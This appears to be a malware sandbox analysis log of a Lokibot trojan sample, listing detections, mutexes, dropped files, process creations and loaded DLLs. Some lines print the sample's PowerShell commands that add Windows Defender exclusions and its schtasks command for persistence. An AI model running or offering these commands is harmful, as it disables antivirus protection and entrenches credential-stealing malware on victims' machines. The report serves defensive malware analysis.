              Source: Process Memory Space: HxQXdrrQ.exe PID: 7096, type: MEMORYSTRMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
              Source: YvVDV4cbjy.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              Source: HxQXdrrQ.exe.0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              Source: HxQXdrrQ.exe, 0000000A.00000002.2108841411.0000000000B10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: C:\Windows\system32\C:\Users\user\AppData\Roaming\HxQXdrrQ.exeC:\Users\user\AppData\Roaming\HxQXdrrQ.exeC:\Users\user\AppData\Roaming\HxQXdrrQ.exewinsta0\defaultALLUSERSPROFILE=C:\ProgramDataAPPDATA=C:\Users\user\AppData\RoamingCommonProgramFiles=C:\Program Files\Common FilesCommonProgramFiles(x86)=C:\Program Files (x86)\Common FilesCommonProgramW6432=C:\Program Files\Common FilesCOMPUTERNAME=user-PCComSpec=C:\Windows\system32\cmd.exeDriverData=C:\Windows\System32\Drivers\DriverDataHOMEDRIVE=C:HOMEPATH=\Users\userLOCALAPPDATA=C:\Users\user\AppData\LocalLOGONSERVER=\\user-PCNUMBER_OF_PROCESSORS=2OneDrive=C:\Users\user\OneDriveOS=Windows_NTPath=C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsAppsPATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSCPROCESSOR_ARCHITECTURE=AMD64PROCESSOR_IDENTIFIER=Intel64 Family 6 Model 143 Stepping 8, GenuineIntelPROCESSOR_LEVEL=6PROCESSOR_REVISION=8f08ProgramData=C:\ProgramDataProgramFiles=C:\Program FilesProgramFiles(x86)=C:\Program Files (x86)ProgramW6432=C:\Program FilesPSModulePath=%ProgramFiles(x86)%\WindowsPowerShell\Modules;C:\Windows\system32\WindowsPowerShell\v1.0\Modules;C:\Program Files (x86)\AutoIt3\AutoItXPUBLIC=C:\Users\PublicSystemDrive=C:SystemRoot=C:\WindowsTEMP=C:\Users\user\AppData\Local\TempTMP=C:\Users\user\AppData\Local\TempUSERDOMAIN=user-PCUSERDOMAIN_ROAMINGPROFILE=user-PCUSERNAME=userUSERPROFILE=C:\Users\userwindir=C:\Windows.VBp
              Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@21/17@0/1
              Source: C:\Users\user\AppData\Roaming\HxQXdrrQ.exeCode function: 15_2_0040434D CoInitialize,CoCreateInstance,VariantInit,SysAllocString,VariantInit,VariantInit,SysAllocString,VariantInit,SysFreeString,SysFreeString,CoUninitialize,15_2_0040434D
              Source: C:\Users\user\Desktop\YvVDV4cbjy.exeFile created: C:\Users\user\AppData\Roaming\HxQXdrrQ.exeJump to behavior
              Source: C:\Users\user\Desktop\YvVDV4cbjy.exeMutant created: \Sessions\1\BaseNamedObjects\FDD42EE188E931437F4FBE2C
              Source: C:\Users\user\AppData\Roaming\HxQXdrrQ.exeMutant created: NULL
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6336:120:WilError_03
              Source: C:\Users\user\AppData\Roaming\HxQXdrrQ.exeMutant created: \Sessions\1\BaseNamedObjects\cmeIbBONpPebqxDUn
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:616:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1732:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2316:120:WilError_03
              Source: C:\Users\user\Desktop\YvVDV4cbjy.exeFile created: C:\Users\user\AppData\Local\Temp\tmp1DE9.tmpJump to behavior
              Source: YvVDV4cbjy.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              Source: YvVDV4cbjy.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%
              Source: C:\Users\user\Desktop\YvVDV4cbjy.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
              Source: C:\Users\user\Desktop\YvVDV4cbjy.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
              Source: YvVDV4cbjy.exeVirustotal: Detection: 74%
              Source: YvVDV4cbjy.exeReversingLabs: Detection: 79%
              Source: C:\Users\user\Desktop\YvVDV4cbjy.exeFile read: C:\Users\user\Desktop\YvVDV4cbjy.exeJump to behavior
              Source: unknownProcess created: C:\Users\user\Desktop\YvVDV4cbjy.exe "C:\Users\user\Desktop\YvVDV4cbjy.exe"
              Source: C:\Users\user\Desktop\YvVDV4cbjy.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\YvVDV4cbjy.exe"
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\Desktop\YvVDV4cbjy.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\HxQXdrrQ.exe"
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\Desktop\YvVDV4cbjy.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\HxQXdrrQ" /XML "C:\Users\user\AppData\Local\Temp\tmp1DE9.tmp"
              Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\Desktop\YvVDV4cbjy.exeProcess created: C:\Users\user\Desktop\YvVDV4cbjy.exe "C:\Users\user\Desktop\YvVDV4cbjy.exe"
              Source: unknownProcess created: C:\Users\user\AppData\Roaming\HxQXdrrQ.exe C:\Users\user\AppData\Roaming\HxQXdrrQ.exe
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
              Source: C:\Users\user\AppData\Roaming\HxQXdrrQ.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\HxQXdrrQ" /XML "C:\Users\user\AppData\Local\Temp\tmp31BF.tmp"
              Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\AppData\Roaming\HxQXdrrQ.exeProcess created: C:\Users\user\AppData\Roaming\HxQXdrrQ.exe "C:\Users\user\AppData\Roaming\HxQXdrrQ.exe"
              Source: C:\Users\user\AppData\Roaming\HxQXdrrQ.exeProcess created: C:\Users\user\AppData\Roaming\HxQXdrrQ.exe "C:\Users\user\AppData\Roaming\HxQXdrrQ.exe"
              Source: C:\Users\user\Desktop\YvVDV4cbjy.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\YvVDV4cbjy.exe"Jump to behavior
              Source: C:\Users\user\Desktop\YvVDV4cbjy.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\HxQXdrrQ.exe"Jump to behavior
              Source: C:\Users\user\Desktop\YvVDV4cbjy.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\HxQXdrrQ" /XML "C:\Users\user\AppData\Local\Temp\tmp1DE9.tmp"Jump to behavior
              Source: C:\Users\user\Desktop\YvVDV4cbjy.exeProcess created: C:\Users\user\Desktop\YvVDV4cbjy.exe "C:\Users\user\Desktop\YvVDV4cbjy.exe"Jump to behavior
              Source: C:\Users\user\AppData\Roaming\HxQXdrrQ.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\HxQXdrrQ" /XML "C:\Users\user\AppData\Local\Temp\tmp31BF.tmp"Jump to behavior
              Source: C:\Users\user\AppData\Roaming\HxQXdrrQ.exeProcess created: C:\Users\user\AppData\Roaming\HxQXdrrQ.exe "C:\Users\user\AppData\Roaming\HxQXdrrQ.exe"Jump to behavior
              Source: C:\Users\user\AppData\Roaming\HxQXdrrQ.exeProcess created: C:\Users\user\AppData\Roaming\HxQXdrrQ.exe "C:\Users\user\AppData\Roaming\HxQXdrrQ.exe"Jump to behavior
              Source: C:\Users\user\Desktop\YvVDV4cbjy.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Users\user\Desktop\YvVDV4cbjy.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Users\user\Desktop\YvVDV4cbjy.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\Desktop\YvVDV4cbjy.exeSection loaded: version.dllJump to behavior
              Source: C:\Users\user\Desktop\YvVDV4cbjy.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Users\user\Desktop\YvVDV4cbjy.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Users\user\Desktop\YvVDV4cbjy.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Users\user\Desktop\YvVDV4cbjy.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Users\user\Desktop\YvVDV4cbjy.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Users\user\Desktop\YvVDV4cbjy.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Users\user\Desktop\YvVDV4cbjy.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Users\user\Desktop\YvVDV4cbjy.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Users\user\Desktop\YvVDV4cbjy.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Users\user\Desktop\YvVDV4cbjy.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Users\user\Desktop\YvVDV4cbjy.exeSection loaded: windowscodecs.dllJump to behavior
              Source: C:\Users\user\Desktop\YvVDV4cbjy.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\YvVDV4cbjy.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Users\user\Desktop\YvVDV4cbjy.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Users\user\Desktop\YvVDV4cbjy.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\YvVDV4cbjy.exeSection loaded: dwrite.dllJump to behavior
              Source: C:\Users\user\Desktop\YvVDV4cbjy.exeSection loaded: iconcodecservice.dllJump to behavior
              Source: C:\Users\user\Desktop\YvVDV4cbjy.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Users\user\Desktop\YvVDV4cbjy.exeSection loaded: edputil.dllJump to behavior
              Source: C:\Users\user\Desktop\YvVDV4cbjy.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Users\user\Desktop\YvVDV4cbjy.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Users\user\Desktop\YvVDV4cbjy.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Users\user\Desktop\YvVDV4cbjy.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Users\user\Desktop\YvVDV4cbjy.exeSection loaded: windows.staterepositoryps.dllJump to behavior
              Source: C:\Users\user\Desktop\YvVDV4cbjy.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Users\user\Desktop\YvVDV4cbjy.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Users\user\Desktop\YvVDV4cbjy.exeSection loaded: appresolver.dllJump to behavior
              Source: C:\Users\user\Desktop\YvVDV4cbjy.exeSection loaded: bcp47langs.dllJump to behavior
              Source: C:\Users\user\Desktop\YvVDV4cbjy.exeSection loaded: slc.dllJump to behavior
              Source: C:\Users\user\Desktop\YvVDV4cbjy.exeSection loaded: sppc.dllJump to behavior
              Source: C:\Users\user\Desktop\YvVDV4cbjy.exeSection loaded: onecorecommonproxystub.dllJump to behavior
              Source: C:\Users\user\Desktop\YvVDV4cbjy.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
              Source: C:\Users\user\Desktop\YvVDV4cbjy.exeSection loaded: ntmarta.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dllJump to behavior
              Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Users\user\Desktop\YvVDV4cbjy.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Users\user\Desktop\YvVDV4cbjy.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Users\user\Desktop\YvVDV4cbjy.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Users\user\Desktop\YvVDV4cbjy.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Users\user\Desktop\YvVDV4cbjy.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Users\user\Desktop\YvVDV4cbjy.exeSection loaded: vaultcli.dllJump to behavior
              Source: C:\Users\user\Desktop\YvVDV4cbjy.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Users\user\Desktop\YvVDV4cbjy.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Users\user\Desktop\YvVDV4cbjy.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Users\user\Desktop\YvVDV4cbjy.exeSection loaded: netapi32.dllJump to behavior
              Source: C:\Users\user\Desktop\YvVDV4cbjy.exeSection loaded: samcli.dllJump to behavior
              Source: C:\Users\user\Desktop\YvVDV4cbjy.exeSection loaded: samlib.dllJump to behavior
              Source: C:\Users\user\Desktop\YvVDV4cbjy.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Users\user\Desktop\YvVDV4cbjy.exeSection loaded: dpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\YvVDV4cbjy.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Users\user\Desktop\YvVDV4cbjy.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Users\user\Desktop\YvVDV4cbjy.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\YvVDV4cbjy.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\HxQXdrrQ.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\HxQXdrrQ.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\HxQXdrrQ.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\HxQXdrrQ.exeSection loaded: version.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\HxQXdrrQ.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\HxQXdrrQ.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\HxQXdrrQ.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\HxQXdrrQ.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\HxQXdrrQ.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\HxQXdrrQ.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\HxQXdrrQ.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\HxQXdrrQ.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\HxQXdrrQ.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\HxQXdrrQ.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\HxQXdrrQ.exeSection loaded: windowscodecs.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\HxQXdrrQ.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\HxQXdrrQ.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\HxQXdrrQ.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\HxQXdrrQ.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\HxQXdrrQ.exeSection loaded: dwrite.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\HxQXdrrQ.exeSection loaded: iconcodecservice.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\HxQXdrrQ.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\HxQXdrrQ.exeSection loaded: edputil.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\HxQXdrrQ.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\HxQXdrrQ.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\HxQXdrrQ.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\HxQXdrrQ.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\HxQXdrrQ.exeSection loaded: windows.staterepositoryps.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\HxQXdrrQ.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\HxQXdrrQ.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\HxQXdrrQ.exeSection loaded: appresolver.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\HxQXdrrQ.exeSection loaded: bcp47langs.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\HxQXdrrQ.exeSection loaded: slc.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\HxQXdrrQ.exeSection loaded: sppc.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\HxQXdrrQ.exeSection loaded: onecorecommonproxystub.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\HxQXdrrQ.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
              Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: fastprox.dll
              Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: ncobjapi.dll
              Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dll
              Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dll
              Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mpclient.dll
              Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: userenv.dll
              Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: version.dll
              Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: msasn1.dll
              Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wmitomi.dll
              Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mi.dll
              Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dll
              Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dll
              Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: gpapi.dll
              Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dll
              Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dll
              Source: C:\Users\user\AppData\Roaming\HxQXdrrQ.exeSection loaded: cryptsp.dll
